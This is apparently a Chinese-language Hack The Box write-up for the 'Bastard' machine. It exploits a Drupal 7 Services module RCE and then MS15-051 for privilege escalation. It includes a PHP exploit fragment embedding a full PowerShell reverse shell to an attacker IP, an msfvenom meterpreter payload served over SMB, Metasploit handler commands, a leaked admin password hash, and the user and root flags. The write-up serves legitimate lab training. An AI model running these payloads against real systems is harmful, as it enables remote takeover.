[Meachines] [Medium] Bastard Drupal 7 Module Services-RCE+MS15-051权限提升

信息收集

IP Address Opening Ports
10.10.10.9 TCP:80,135,49154

$ nmap -p- 10.10.10.9 --min-rate 1000 -sC -sV

bash 复制代码
PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-generator: Drupal 7 (http://drupal.org)
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to Bastard | Bastard
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Drupal 7 Module Services-RCE

http://10.10.10.9/

http://10.10.10.9/robots.txt

http://10.10.10.9/CHANGELOG.txt

https://www.exploit-db.com/exploits/41564

php 复制代码
$url = 'http://10.10.10.9';
$endpoint_path = '/rest';
$endpoint = 'rest_endpoint';

$file = [
    'filename' => 'shell.php',
    'data' => '<?php system("powershell -nop -c \"\$client = New-Object System.Net.Sockets.TCPClient(\'10.10.16.24\',10032);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + \'PS \' + (pwd).Path + \'> \';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()\""); ?>'
];

$ sudo apt install php-curl

$ php exp.php

{
    "session_name": "SESSd873f26fc11f2b7e6e4aa0f6fce59913",
    "session_id": "Zw1wwWt-USZemMbiPVyHFCCpPqvnw5cbjPgL-2YDF08",
    "token": "BFVo-XA0XA1ysC6wUlZUmKTveSWztk31k8DKdRSTA8Y"
}
{
    "uid": "1",
    "name": "admin",
    "mail": "drupal@hackthebox.gr",
    "theme": "",
    "created": "1489920428",
    "access": "1492102672",
    "login": 1724736333,
    "status": "1",
    "timezone": "Europe\/Athens",
    "language": "",
    "picture": null,
    "init": "drupal@hackthebox.gr",
    "data": false,
    "roles": {
        "2": "authenticated user",
        "3": "administrator"
    },
    "rdf_mapping": {
        "rdftype": [
            "sioc:UserAccount"
        ],
        "name": {
            "predicates": [
                "foaf:name"
            ]
        },
        "homepage": {
            "predicates": [
                "foaf:page"
            ],
            "type": "rel"
        }
    },
    "pass": "$S$DRYKUR0xDeqClnV5W0dnncafeE.Wi4YytNcBmmCtwOjrcH5FJSaE"
}

User.txt

da68abc3febb3f3a8613aaaf363ebbdc

权限提升 && MS15-051

$ impacket-smbserver share /tmp -smb2support

PS C:\Users> dir \\10.10.16.24\share

$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.24 LPORT=10033 -f exe -o payload.exe

将会话转移至msf

msf6 > use exploit/multi/handler

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set LHOST 0.0.0.0

msf6 exploit(multi/handler) > set LPORT 10033

msf6 exploit(multi/handler) > exploit

PS C:\inetpub\drupal-7.54> \\10.10.16.24\share\payload.exe

msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester

msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1

msf6 post(multi/recon/local_exploit_suggester) > exploit

https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS15-051

PS C:\inetpub\drupal-7.54> \\10.10.16.24\share\MS15-051-KB3045171\ms15-051x64.exe "whoami"

msf6 > use exploit/multi/handler

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set LHOST 0.0.0.0

msf6 exploit(multi/handler) > set LPORT 10033

msf6 exploit(multi/handler) > exploit

PS C:\inetpub\drupal-7.54> \\10.10.16.24\share\MS15-051-KB3045171\ms15-051x64.exe "\\10.10.16.24\share\payload.exe"

Root.txt

ba5ae3c3b7faa2048e85f591c5ed023a

相关推荐
独行soc1 分钟前
#渗透测试#漏洞挖掘#红蓝攻防#护网#sql注入介绍08-基于时间延迟的SQL注入(Time-Based SQL Injection)
数据库·sql·安全·渗透测试·漏洞挖掘
Clockwiseee1 小时前
php伪协议
windows·安全·web安全·网络安全
黑客Ash1 小时前
安全算法基础(一)
算法·安全
云云3211 小时前
搭建云手机平台的技术要求?
服务器·线性代数·安全·智能手机·矩阵
云云3212 小时前
云手机有哪些用途?云手机选择推荐
服务器·线性代数·安全·智能手机·矩阵
xcLeigh2 小时前
网络安全 | 防火墙的工作原理及配置指南
安全·web安全
白乐天_n2 小时前
腾讯游戏安全移动赛题Tencent2016A
安全·游戏
光路科技4 小时前
八大网络安全策略:如何防范物联网(IoT)设备带来的安全风险
物联网·安全·web安全
saynaihe4 小时前
安全地使用 Docker 和 Systemctl 部署 Kafka 的综合指南
运维·安全·docker·容器·kafka
星河梦瑾4 小时前
SpringBoot相关漏洞学习资料
java·经验分享·spring boot·安全